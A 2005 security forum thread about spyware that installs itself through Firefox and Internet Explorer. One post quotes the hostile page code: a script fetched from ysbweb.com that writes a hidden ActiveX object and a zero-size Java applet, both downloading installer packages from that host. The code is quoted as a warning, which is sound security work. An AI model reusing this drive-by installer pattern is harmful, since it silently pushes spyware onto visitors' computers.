Firefox Spyware Infects IE?

Discussion in 'other security issues & news' started by musicman, Mar 13, 2005.

Thread Status:
Not open for further replies.
  1. musicman

    musicman Registered Member

    Joined:
    Aug 24, 2003
    Posts:
    199
    I thought this would be of interest to our members as I read this report from another security forum.
    ========================================================

    paperghost's article can be found here, at Vital Security.org - Firefox Spyware infects IE?


    Edit Note - Please do not copy & paste an entire article - a summary or paragraph from the article is enough. Also, a link to the original source should be included. - snap
     
    Last edited by a moderator: Mar 14, 2005
  2. bigbuck

    bigbuck Registered Member

    Joined:
    Jul 7, 2004
    Posts:
    4,877
    Location:
    Qld, Aus
  3. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    From spywareinfoforum.com:

    Spywareinfo Newsletter Mar13/05
     
    Last edited by a moderator: Mar 14, 2005
  4. Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie.
     
  5. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Having re-read the original Wilders thread that I'm assuming you are referring to concerning this exploit....the script comments were mentioned if for no other reason than to caution IE users not to visit that site with Active script enabled because the java applet would be loaded along with a toolbar.

    Opinions may vary....but I would hardly call any posts directed toward your posts as being dismissed. I also am of the opinion one can not BS a BS concerning...."I was ignored cos I'm a newbie" ;)

    Do not visit the below links without being properly secured

    Visiting lyricspy.com with Active script enabled excutes the below code:

    <script language='JavaScript' type='text/JavaScript'
    src='http://www.ysbweb.com/ist/scripts/ysb_prompt.php?
    retry=2&loadfirst=1&delayload=0&software_id=10&account_id=1001958&
    recurrence=always&adid=a1110115353&event_type=onload&user_level=3'>
    </script>

    Which then excutes the below code:

    function showActiveX() {
    holder.write('<OBJECT id="barobject" width=1 height=1
    classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
    holder.write
    ('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab"
    onerror="parent.retryit();">');

    holder.write('<PARAM name="account_id" value="1001958">');
    holder.write('<PARAM name="download_key"
    value="df42914d752e3362ade7e24cced39c71">');
    holder.write('<PARAM name="download_lock" value="1110807725">');
    holder.write('<PARAM name="cfg" value="ysb_l3">');
    holder.write('<PARAM name="sub" value="">');
    holder.write('</OBJECT>');
    }

    function showJava() {

    holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
    holder.write('<PARAM name="account_id" value="1001958">');
    holder.write('<PARAM name="download_key" value="df42914d752e3362ade7e24cced39c71">');
    holder.write('<PARAM name="download_lock" value="1110807725">');
    holder.write('<PARAM name="cfg" value="ysb_l3">');
    holder.write('<PARAM name="sub" value="">');
    holder.write('</APPLET>');
     
  6. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Since we already have an ongoing thread concerning this issue from last week....I'll ask those that wish to continue the discussion Please visit the below link. This thread is now closed.

    This link---> New Theory about Infections and Spyware
     
Loading...
Thread Status:
Not open for further replies.